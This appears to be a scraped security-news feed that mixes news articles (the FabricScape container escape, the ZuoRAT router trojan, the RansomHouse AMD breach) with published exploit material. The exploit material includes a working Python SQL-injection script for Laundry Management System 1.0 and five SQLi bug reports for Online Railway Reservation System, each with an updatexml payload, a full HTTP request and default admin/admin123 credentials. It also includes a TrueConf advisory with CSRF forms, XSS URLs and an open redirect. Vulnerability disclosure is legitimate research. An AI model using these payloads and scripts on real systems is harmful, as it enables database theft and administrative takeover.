Laundry Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Laundry Management System 1.0 - Authenticated SQL Injection# Date: 29-06-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ci_laundry.zip# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description # The dari parameter does not perform input validation on the laporan_filter.php file it allow authenticated SQL Injectionimport sysimport requestssess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login(ip,username,password):    target = "http://%s/ci_laundry/welcome/login" % ip    daftar = {'username':username,'password':password}    masuk = sess.post(target, data=daftar, proxies=proxies)    if "Dashboard" in masuk.text:        print("[$] Success Login :)")    else:        return Falsedef trigger_sqli(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1'",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if "You have an error in your SQL syntax" in test.text:        print("[$] Trigger SQL Injection !!!! :)")    else:        return Falsedef count_column(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1' ORDER BY 14-- -",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if test.status_code == 200:        print("[$] Found 14 Column In Database !!! :)")    def got_database_name(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1' union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if "laundry_db" in test.text:        print("[$] Found Database Name is => laundry_db")def got_version_data(ip):    target = "http://%s/ci_laundry/pengeluaran/laporan_filter" % ip    sql = {"dari":"1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14-- -",'sampai':'123'}    test = sess.post(target, data=sql, proxies=proxies)    if "10.4.24-MariaDB" in test.text:        print("[$] Found Version Database is => 10.4.24-MariaDB")if __name__ == "__main__":    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x admin admin123"  % sys.argv[0])        sys.exit(-1)login(ip,username,password)trigger_sqli(ip)count_column(ip)got_database_name(ip)got_version_data(ip)

Laundry Management System 1.0 SQL Injection

Microsoft is urging organizations that don't have automatic updates enabled to update to the latest version of Linux Server Fabric to thwart the "FabricScape" cloud bug.

Microsoft this week disclosed a serious container-escape vulnerability in its widely used Azure Service Fabric technology, which gives attackers a way to gain root privileges on the host node and take over all other nodes in the cluster.

The privilege-escalation bug is only exploitable on Linux containers, though it is present in Windows container environments as well, Microsoft said in an advisory Tuesday. Security researchers from Palo Alto Networks reported the bug — which they have dubbed FabricScape — along with a fully operational exploit, on Jan. 30, 2022. Microsoft released a fix for the issue (CVE-2022-30137) on June 14, but details on the bug were just released this week.

The fix has been applied to all customers that are subscribed to Microsoft's automatic update service, but others will need to manually patch to the latest version of Service Fabric. "Customers whose Linux clusters are automatically updated do not need to take further action," the company said in its bug disclosure announcement.

**A Privilege-Escalation Issue**

Service Fabric is a Microsoft container-orchestration technology — like Kubernetes. Numerous organizations use it as a platform-as-a-service to deploy and manage containers and microservices-based cloud applications across a cluster of machines. Palo Alto Networks used Microsoft data to estimate that Service Fabric hosts more than 1 million applications daily across millions of cores.

The bug that Palo Alto Network discovered exists in a logging function with high privileges in a Service Fabric component called Data Collection Agent (DCA). Researchers from the security vendor's Unit 42 threat intelligence team found that an attacker with access to a compromised container could exploit the vulnerability to escalate privileges and gain control of the host node and, from there, escape it and attack the entire cluster.

"The vulnerability allows attackers to take over the entire Service Fabric environment if they get a hold of a single application," says Ariel Zelivansky, director of security research at Palo Alto Networks. This allows attackers to perform lateral movement and to steal, destroy, or manipulate data. Other actions that an attacker could take by exploiting FabricScape include deploying ransomware or hijacking systems for cryptomining.

"If an organization hosts all of its applications, and possibly credentials, on Service Fabric, an attacker can gain control of all of those," Zelivansky says.

For an attack to be successful, a threat actor would first need to find a way to compromise a containerized workload on a Linux Service Fabric cluster, Microsoft said. The attacker would then need to trigger the DCA to run the vulnerable function in a manner that results in a so-called "race condition" where malicious code can be introduced into the environment.

**PoC: Exploiting the Flaw**

Researchers at Palo Alto Networks were able to exploit the vulnerability on Azure Service Fabric using a container under their control and a simulated compromised workload. They found the attack only worked if the compromised container had access to Service Fabric runtime data — something that is granted by default in single-tenant environments but less common in multitenant setups.

"Any application that is powered by a Service Fabric Linux cluster with runtime access, which is granted by default, is affected," Zelivansky said. Last year, Palo Alto Networks discovered another set of vulnerabilities in the Azure Container Instances (ACI) platform that allowed for a similar container escape.

Microsoft urged organizations using Service Fabric to review containerized workloads in both Linux and Windows environments that had access to host clusters. "By default, a \[Service Fabric\] cluster is a single-tenant environment and thus there is no isolation between applications," Microsoft said. All applications running in these single tenant environments are considered trusted and therefore have access to Service Fabric runtime, Microsoft said.

Thus, organizations that want to run untrusted application in a Service Fabric cluster should take additional measures to create isolation between applications and should remove access to Service Fabric runtime for those untrusted apps, Microsoft said.

Zelivansky says the first layer of defense against vulnerabilities such as FabricScape is focusing on the application itself, limiting the possibility of an attack by remediating known vulnerabilities in their code. They can also limit exposure to the Internet.

However, he offers a caveat: "But the reality is that even if an application is safe from any known vulnerability, zero-day vulnerabilities could be discovered and exploited in any code. And \[software\] supply-chain attacks such as typosquatted or malicious packages are becoming more common than before," he says.

Zelivansky says organizations running Linux Service Fabric clusters should check their cluster version and verify the version is at least 9.0.1035.1. "An organization should check if they have Linux-based applications on Service Fabric. If the answer is yes, we recommend giving top priority to addressing this vulnerability now that its full details are out."

**Cloud Vulnerabilities in Cyberattackers' Sights**

Vulnerabilities in cloud products and services have become a growing concern for organizations — and not just because of the security risks associated with them. In many cases, organizations also have a hard time keeping track of cloud vulnerabilities because of the absence of a common vulnerability enumeration (CVE) program for cataloging them. Because many cloud-security issues are considered the service provider's sole responsibility, there often has been little disclosure of these issues, leaving organizations in the dark about whether they might have been exposed to a specific threat.

This week researchers at Wiz launched a new community-based cloud vulnerability database aimed at addressing this lack of information. The database currently contains information on some 70 previous security issues in cloud products and services. Anyone can add to the database going forward. The goal is to make it a central repository for information on cloud threats in the absence of a formal program like MITRE's CVE program for information security flaws.

Patch Now: Linux Container-Escape Flaw in Azure Service Fabric

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_service.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_service

Vulnerability location: /orrs/classes/Master.php?f=delete\_service, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

You need to execute the following sql statement in the database to create the "service\_list" table

CREATE TABLE \`service\_list\` (
  \`id\` int(30) NOT NULL,
  \`code\` varchar(100) NOT NULL,
  \`name\` text NOT NULL,
  \`delete\_flag\` tinyint(1) NOT NULL,
  \`date\_created\` datetime NOT NULL,
  \`date\_updated\` datetime NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

POST /orrs/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33061: bug_report/SQLi-9.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_train.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_train

Vulnerability location: /orrs/classes/Master.php?f=delete\_train, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_train HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=trains
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33059: bug_report/SQLi-7.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_message.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_message

Vulnerability location: /orrs/classes/Master.php?f=delete\_message, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_message HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=inquiries
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33058: bug_report/SQLi-6.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_reservation.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_reservation

Vulnerability location: /orrs/classes/Master.php?f=delete\_reservation, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=8' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_reservation HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=reservations
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=8' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33057: bug_report/SQLi-5.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_schedule.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/classes/Master.php?f=delete\_schedule

Vulnerability location: /orrs/classes/Master.php?f=delete\_schedule, id=

Current database name: orrs\_db,length is 7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /orrs/classes/Master.php?f\=delete\_schedule HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/orrs/admin/?page=schedules
Content-Length: 65
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-33060: bug_report/SQLi-8.md at main · k0xx11/bug_report

The malware has been in circulation since 2020, with sophisticated, advanced malicious actors taking advantage of the vulnerabilities in SOHO routers as the work-from-home population expands rapidly.

Security researchers have discovered a multi-stage remote access Trojan (RAT) currently being used against a wide range of small office-home office (SOHO) routers in Europe and North America — potentially the work of a state-sponsored actor.

Researchers believe that at least 80 victims have been infected so far during the campaign.

The malware, known as ZuoRAT, has been active since 2020, according to the Black Lotus Labs, the threat intelligence arm of Lumen Technologies.

According to the report, the malware makes its way onto the routers through exploits for known vulnerabilities. It can also infect other devices in the network and introduce additional malware via DNS and HTTP hijacking.

"ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device, and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules)," Lumen's threat intelligence team wrote in a blog post on the malware.

**Trojan Targets Cisco, Netgear Routers**

The malware targets routers from Cisco, Netgear, Asus, and DrayTek.

"The device types consisted of, but were not limited to: Cisco RV 320, 325 and 420; Asus RT-AC68U, RT-AC530, RT-AC68P and RT-AC1900U; DrayTek Vigor 3900 and unspecified NETGEAR devices," according to the analysis.

The research team noted that while compromising SOHO routers as an access vector to gain access to an adjacent LAN is not a novel technique, it has seldom been reported.

"Reports of person-in-the-middle style attacks, such as DNS and HTTP hijacking, are \[rare\] and a mark of a complex and targeted operation," the post continued. "The use of these two techniques congruently demonstrated a high level of sophistication by a threat actor, indicating that this campaign was possibly performed by a state-sponsored organization."

From the perspective of Danny Adamitis, principal information security engineer for Lumen Black Lotus Labs, the sophistication of this campaign cannot be overstated, especially the ability to enumerate infected devices and the LANs they are connected to, and packet-capture network traffic for additional targeting.

"Moreover, the multi-stage campaign includes multiple fully functional Trojans, as well as complex and covert C2 and proxy C2 infrastructure to obfuscate command-and-control and evade detection, which is why it went undetected for nearly two years," he adds.

**Other Trojans Found on Hacked Devices**

To Adamitis' point, the researchers found two other Trojans on the hacked devices. One was based on C++ and targeted Windows workstations. The other Trojan was based on the Go programming language and attacked Linux and macOS as well as Windows.

Among other things, they allowed the attackers to start new processes, gain permanent access to infected systems, intercept network traffic, and upload or download arbitrary files.

**Shift to Secure the Home Office**

According to a recent survey, nearly a quarter of the respondents (23%) named securing the remote workforce as their top priority for 2022. Routers are an important part of that, as they act as central waypoints for the rest of the home IT footprint.

"Once you are on the router you have a full trusted connection to poke and prod at whatever device is connected to it," Dahvid Schloss, offensive security team lead at Echelon, said via email. "From there, you could attempt to use proxychains to throw exploits into the network or just monitor all the traffic going in, out, and around the network."

So, as part of the work-from-home shift, some major vendors are moving their security focus, such as HP, which helps admins secure work-from-home endpoints by extending cloud security management that can remotely track, detect, and self-heal remote company devices.

"The consumer router space is ripe for targeting because these devices reside outside of the traditional security perimeter, and they are rarely monitored or patched," Adamitis adds. "This is only exacerbated by the rapid shift to remote work at the start of the pandemic."

Alex Ondrick, director of security operations at incident-response specialist BreachQuest, says a general lack of security controls for consumer-grade routers, and difficulties in "force" patching/update for them, makes SOHO routers particularly vulnerable.

"If a SOHO router is unpatched or vulnerable to known security flaws, ZuoRAT poses a dangerous combination of reconnaissance and authentication-bypass exploit script and lateral-movement capabilities," he explains.

**Bolstering the Human Firewall**

Ondrick adds that the SOHO router threat is an opportunity for organizations to expand their security awareness programs and spread valuable improved security measures among their users.

"Educating users on how to protect their home networks, their passwords, their financial information, and their families increases their engagement and builds cybersecurity hygiene and acumen they take back to the office, and reduces the organization's attack surface and builds the better human firewall," he says.

He says SOHO users should regularly update their router's firmware and ensure their devices are behind multiple layers of security (defense-in-depth) wherever possible.

For home routers, he says it's important to leverage the vendor's built-in security capabilities alongside host-based network security wherever possible.

"Think of your home router as 'yet another' device which should be regularly updated and think of it as the 'first line of defense' between you and the public-facing Internet," he says. "Pending any leaps forward in SOHO router security, consider adding a recurring biannual reminder on your phone or calendar to check for updates on your router's firmware."

ZuoRAT Hijacks SOHO Routers From Cisco, Netgear

By Waqas
RansomHouse first appeared in cyberspace in December 2021. So far, the gang has claimed six victims, including Gaming…
This is a post from HackRead.com Read the original post: RansomHouse Claims Stealing 450GB of Data from Semiconductor Giant AMD

****RansomHouse first appeared in cyberspace in December 2021. So far, the gang has claimed six victims, including Gaming Authority (SLGA), Saskatchewan Liquor, and Shoprite Holdings.******AMD Suffers Data Breach**

Leading US-based chipmaker AMD is the latest alleged victim of a targeted data breach. The company’s spokesperson confirmed investigating a cyberattack from data cybercrime gang RansomHouse. The gang reportedly extorted data from AMD, however, the incident is currently under investigation.

List of targets claimed by the RansomHouse ransomware gang (Image: Hackread.com)

**How Much Data was Stolen?**

It is worth noting that RansomHouse hasn’t provided evidence of the data except for files containing AMD’s Windows domain information, which includes a CSV with a list of around 70,000 devices belonging to AMD’s internal network.

The hackers are pretty active on Telegram and brag about successfully targeting a three-letter company, the name of which starts with an A. AMD spokesperson stated that the attackers claim to have stolen around 450 GB of data, which they now threaten to sell.

RansomHouse on Telegram (Image: Hackread.com)

The group also added AMD to its data leak website and confirmed stealing 450 GB worth of data. RansomHouse stated that the stolen data includes financial and research-related information.

**Details of the Incident**

RansomHouse stated that they attacked AMD on 5 January 2022 and blamed the company’s weak security practices for the incident. The hackers revealed that they compromised AMD quickly as it used weak passwords on all its networks, such as ‘password’, ‘P@ssw0rd’, ‘amd!23’, and ‘Welcome1.’  

Screenshot from the official Dark Web domain of the RansomHouse ransomware gang (Image: Hackread.com)

Furthermore, the group confirmed that their associates attacked the AMD network last year, but the data was stolen in January 2022, and afterward, RansomHouse lost access to the company’s network.

The group also noted that they didn’t use ransomware during the attack and never contacted AMD for ransom. However, they intend to sell the data to interested parties and threat actors, which in their opinion, would be more profitable.

**More Ransomware News**

*   Iran’s COBALT MIRAGE Threat Group Behind Ransomware Attacks in US
*   GoodWill Ransomware demands food for the poor to decrypt locked files
*   Cardiologist Charged for Developing Jigsaw v.2 and Thanos Ransomware
*   Cyber Security Giant Mandiant Denies Hacking Claims By LockBit Ransomware
*   PoC Shows IoT Devices Can Be Hacked to Install Ransomware on OT Networks

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

RansomHouse Claims Stealing 450GB of Data from Semiconductor Giant AMD

A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

    TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
    
    
    Vendor: TrueConf LLC
    Product web page: https://www.trueconf.com
    Affected version: 4.3.7.12255 and 4.3.7.12219
    
    Summary: TrueConf Server is a powerful, high-quality and highly secured
    video conferencing software server. It is specially designed to work with
    up to 250 participants in a multipoint conference over LAN or VPN networks.
    TrueConf Server requires no hardware and includes client applications for
    all popular platforms, making it an easy-to-set up, unified communications
    solution.
    
    Desc: The administration interface allows users to perform certain actions
    via HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Input passed via the 'redirect_url' GET parameter is not properly verified before
    being used to redirect users. This can be exploited to redirect a user to an
    arbitrary website e.g. when a user clicks a specially crafted link to the affected
    script hosted on a trusted domain.
    
    TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
    input passed via several parameters to several scripts is not properly sanitized
    before being returned to the user. This can be exploited to execute arbitrary HTML
    and script code in a user's browser session in context of an affected site.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Apache/2.4.17 (Win32)
               PHP/5.4.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2017-5393
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
    
    
    01.11.2016
    
    --
    
    
    CSRF Stored XSS:
    ----------------
    
    <html>
      <body>
        <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
          <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
          <input type="hidden" name="invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="date" value="22&#46;01&#46;2017" />
          <input type="hidden" name="time&#45;field" value="17&#58;27" />
          <input type="hidden" name="time&#95;zone" value="60" />
          <input type="hidden" name="subtype" value="3" />
          <input type="hidden" name="podiums" value="6" />
          <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
          <input type="hidden" name="key" value="dfa95f7e1d" />
          <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="owner" value="" />
          <input type="hidden" name="gconf&#45;edit" value="ok" />
          <input type="hidden" name="webTtype" value="0" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
    
    
    
    Reflected XSS:
    --------------
    
    http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
    http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
    
    
    
    DOM XSS:
    --------
    
    http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
    http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
    
    
    
    Open Redirect:
    --------------
    
    Request:
    
    GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
    Host: 127.0.0.1:8888
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response:
    
    HTTP/1.1 302 Found
    Date: Thu, 22 Sep 2016 21:15:40 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.zeroscience.mk
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    
    
    CSRF Stop Web Service:
    ----------------------
    
    <html>
      <body>
        <form action="http://127.0.0.1/admin/service/stop/" method="POST">
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>

Tag

#windows